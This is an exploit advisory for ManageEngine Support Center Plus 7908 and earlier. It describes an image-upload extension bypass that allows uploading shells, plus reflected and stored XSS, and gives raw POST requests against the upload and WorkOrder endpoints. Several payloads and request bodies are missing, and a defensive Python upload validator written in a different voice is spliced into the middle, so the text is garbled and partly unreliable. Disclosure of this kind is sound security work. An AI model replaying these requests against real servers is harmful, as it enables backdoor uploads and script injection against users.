# Exploit Title : ManageEngine Support Center Plus <=7908 Multiple Vulnerabilities
# Date : 06-03-2012
# Author : xistence (xistence<[AT]>0x90.nl)
# Software link : http://www.manageengine.com/products/support-center/64045241/ManageEngine_SupportCenter_Plus_7_9_0_SP-0_8_0.ppm
# Vendor site : http://www.manageengine.com/
# Version : 7908 and lower
# Tested on : CentOS 5.x
1) Arbitrary File Upload (File Extension Verification Bypass)
It is possible to bypass the image extension check in the ticket creation editor. Normally you go to Requests -> New Request and select "Insert Image" to upload a picture to be included in the ticket; the editor restricts this to jpg/gif/png files. If you send a POST request directly to the /jsp/UploadImage.jsp?Module=Workorder URL, you can upload any file. This could allow web application files (backdoors/shells) to be uploaded and used for malicious actions.
Below is a sample POST request; note that a valid session cookie (i.e. an authenticated user) is needed to perform these actions. The request uploads a file test.txt with the contents "TEST!".
POST /jsp/UploadImage.jsp?Module=WorkOrder HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Length: 231
Content-Type: multipart/form-data; boundary=---------------------------135769595918512168611930018855
Content-Disposition: form-data; name="img_file"; filename="test.txt"
Content-Type: image/gif
In the HTTP response you'll see this:
This makes the following URL accessible, which serves "TEST!" in clear text:
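The bypass works because the only gate is the extension check enforced in the editor, which a direct POST skips, and the server accepts whatever Content-Type the client declares. The Python below is an added example (not ManageEngine code) of the server-side validation a defender would want instead: an extension allowlist, a magic-byte check on the bytes actually received, a consistency check against the declared Content-Type, and a server-chosen storage name. The jpg/gif/png allowlist follows the advisory; the size limit and the function names are assumptions.

```python
import os
import secrets

# Assumed policy: the allowed extensions, the leading bytes each must carry,
# and the MIME type a well-behaved client would declare for it.
ALLOWED_TYPES = {
    "jpg":  {"magic": (b"\xff\xd8\xff",), "mime": "image/jpeg"},
    "jpeg": {"magic": (b"\xff\xd8\xff",), "mime": "image/jpeg"},
    "gif":  {"magic": (b"GIF87a", b"GIF89a"), "mime": "image/gif"},
    "png":  {"magic": (b"\x89PNG\r\n\x1a\n",), "mime": "image/png"},
}
MAX_BYTES = 5 * 1024 * 1024  # assumed upload limit


def validate_upload(filename, declared_type, data):
    """Return (ok, reason). Accept only what is provably an allowed image.

    The client-supplied filename and Content-Type are untrusted hints; the
    decision rests on the file's own leading bytes, so sending test.txt with
    "Content-Type: image/gif" (the advisory's request) is rejected.
    """
    if not data or len(data) > MAX_BYTES:
        return False, "empty or oversized body"
    # Strip any directory part and judge only the final extension, so
    # "evil.jsp.gif" is treated as .gif and must still carry GIF magic bytes.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = base.rsplit(".", 1)[-1].lower() if "." in base else ""
    rule = ALLOWED_TYPES.get(ext)
    if rule is None:
        return False, f"extension '.{ext}' not in allowlist"
    if not any(data.startswith(m) for m in rule["magic"]):
        return False, f"content does not match a {ext} image"
    if declared_type.split(";")[0].strip().lower() != rule["mime"]:
        return False, "declared Content-Type disagrees with content"
    return True, "ok"


def safe_storage_name(ext):
    """Server-chosen file name: the client never controls the stored path."""
    return f"{secrets.token_hex(16)}.{ext}"
```

Run validate_upload on the multipart part's filename, Content-Type and body before touching the filesystem, and store accepted files under safe_storage_name outside the web root.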
2) Reflected XSS
Proof of Concept:
3) Stored XSS vulnerability
How to replicate:
Requests -> New Request
Subject: anything
Description window -> select the Edit HTML button -> insert script code, e.g.:
POST request headers:
POST /WorkOrder.do HTTP/1.1
Host: exploitme:8080
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 312